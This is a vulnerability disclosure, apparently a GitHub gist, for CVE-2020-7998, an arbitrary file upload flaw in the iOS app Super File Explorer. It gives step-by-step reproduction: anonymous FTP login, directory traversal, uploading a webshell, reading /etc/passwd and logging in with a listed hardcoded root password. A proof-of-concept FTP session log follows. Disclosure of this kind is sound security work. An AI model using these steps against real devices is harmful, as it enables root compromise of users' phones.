@adeshkolte
Created January 28, 2020 02:31
CVE-2020-7998 arbitrary file upload web vulnerability Super File Explorer app for iOS
> An arbitrary file upload web vulnerability has been discovered in the
> Super File Explorer app for iOS.
> The vulnerability is located in the developer path that is accessible
> and hidden next to the root path.
> By default, there is no password set for the FTP or Web UI service.
> The arbitrary file upload web vulnerability can be exploited by remote
> attackers without a privileged application user account or user
> interaction. For security demonstration or to reproduce the vulnerability,
> follow the provided information and steps below.
>
> Manual steps to reproduce the vulnerability ...
>
> 1. Install the vulnerable mobile iOS application to your test iDevice (iPhone)
> 2. Start the mobile device software
> 3. Start the FTP and web server via the remote manager button push
> 4. Open the FTP via console and login as a random user with any credentials
> 5. Move to the developer path in the upper folder
> 6. Upload a webshell via the network from a remote system or the local system path
> 7. Open the FTP web UI URL (http://localhost) and move to the developer path
> 8. Open the webshell and request via GET the "/etc/passwd" file that is accessible
> 9. Login again to the FTP server using root:smx7MYTQIi2M
> 10. Successful root access to compromise the FTP server and mobile via the arbitrary file upload vulnerability!
>
> FTP WEB UI URL: http://localhost
>
> FTP SERVER URL: localhost:2121
>
> --- PoC Exploitation ---
>
> ```
> C:\Users\Admin>ftp
> ftp> open 192.168.2.241 2121
> Verbindung mit 192.168.2.241 wurde hergestellt.
> 220 iosFtp server ready.
> 502 Unknown command 'UTF8'
> Benutzer (192.168.2.241:(none)): anonymous
> 331 Password required for anonymous
> Kennwort: a@b.com
> 230 User anonymous logged in.
> ftp> cd ..
> 250 CWD command successful.
> ftp> dir
> 200 PORT command successful.
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 3
> drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 Documents
> drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library
> drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp
> 226 Transfer complete.
> FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s
> ftp> cd /../
> 250 CWD command successful.
> ftp> dir
> 200 PORT command successful.
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 13
> ---------- 1 (null) (null) 0 (null) Applications
> drwxrwxr-x 1 root admin 68 May 29 23:45 Developer
> ---------- 1 (null) (null) 0 (null) Library
> ---------- 1 (null) (null) 0 (null) System
> ---------- 1 (null) (null) 0 (null) bin
> ---------- 1 (null) (null) 0 (null) cores
> ---------- 1 (null) (null) 0 (null) dev
> ---------- 1 (null) (null) 0 (null) etc
> ---------
> ```
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Arbitrary File Upload Vulnerability
>
> ------------------------------------------
>
> [Vendor of Product]
> Super File Explorer 1.0.
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Super File Explorer 1.0.
>
> ------------------------------------------
>
> [Affected Component]
> LZX Apps
> Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Adesh Nandkishor Kolte
>
> ------------------------------------------
>
> [Reference]
> https://apps.apple.com/us/app/super-file-explorer-file-viewer-file-manager/id1101973946
Use CVE-2020-7998.